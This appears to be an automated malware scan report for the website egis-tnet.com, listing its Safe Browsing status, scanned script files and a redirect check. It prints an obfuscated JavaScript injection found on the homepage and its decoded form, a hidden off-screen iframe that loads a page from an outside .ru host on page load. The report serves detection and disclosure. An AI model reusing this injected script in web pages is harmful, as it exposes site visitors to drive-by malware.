Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=egis-tnet.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.egis-tnet.com/ | 200 OK Content-Length: 19396 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
try{grebah++;}catch(hsens){try{sernbhsdfx|15232}catch(eryres){m=Math;if(m)f="flo"+"or";} n="1428..1755..1540..1485..1624..1575..1554..1650..448..1530..1596..1635..910..1500..1400..600..574..480..1722..195..140..1770..1358..1710..448..1575..1428..1710..1526..480..854..480..1400..1665..1386..1755..1526..1515..1540..1740..644..1485..1596..1515..1358..1740..1414..1035..1512..1515..1526..1515..1540..1740..560..585..1470..1530..1596..1455..1526..1515..546..615..826..195..140..1575..1428..1710..152
Decoded script:
function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position='absolute';
    ifrm.style.top='-999em';
    ifrm.style.left='-999em';
    ifrm.src = "http://unxajen.ru/count6.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;
Antivirus reports:
http://www.egis-tnet.com/wp-content/themes/choice/js/dropmenu.jquery.js | 200 OK Content-Length: 54106 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-content/themes/choice/js/dropmenu.js | 200 OK Content-Length: 342 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/tinymce/tiny_mce.js?ver=3.6.1 | 200 OK Content-Length: 231338 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-content/plugins/quick-post-widget/mce/tinybrowser/tb_tinymce.js.php?ver=3.6.1 | 200 OK Content-Length: 1255 Content-Type: application/x-javascript | clean |
http://www.egis-tnet.com/wp-content/plugins/quick-post-widget/js/ui.datepicker.min.js?ver=3.6.1 | 200 OK Content-Length: 36051 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-content/plugins/quick-post-widget/js/ui.datepicker-en.js?ver=3.6.1 | 200 OK Content-Length: 1127 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.3 | 200 OK Content-Length: 4289 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.3 | 200 OK Content-Length: 6488 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js?ver=1.10.3 | 200 OK Content-Length: 2841 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.resizable.min.js?ver=1.10.3 | 200 OK Content-Length: 17273 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.draggable.min.js?ver=1.10.3 | 200 OK Content-Length: 18559 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.button.min.js?ver=1.10.3 | 200 OK Content-Length: 7143 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: egis-tnet.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: egis-tnet.com
Referer: http://www.google.com/search?q=egis-tnet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.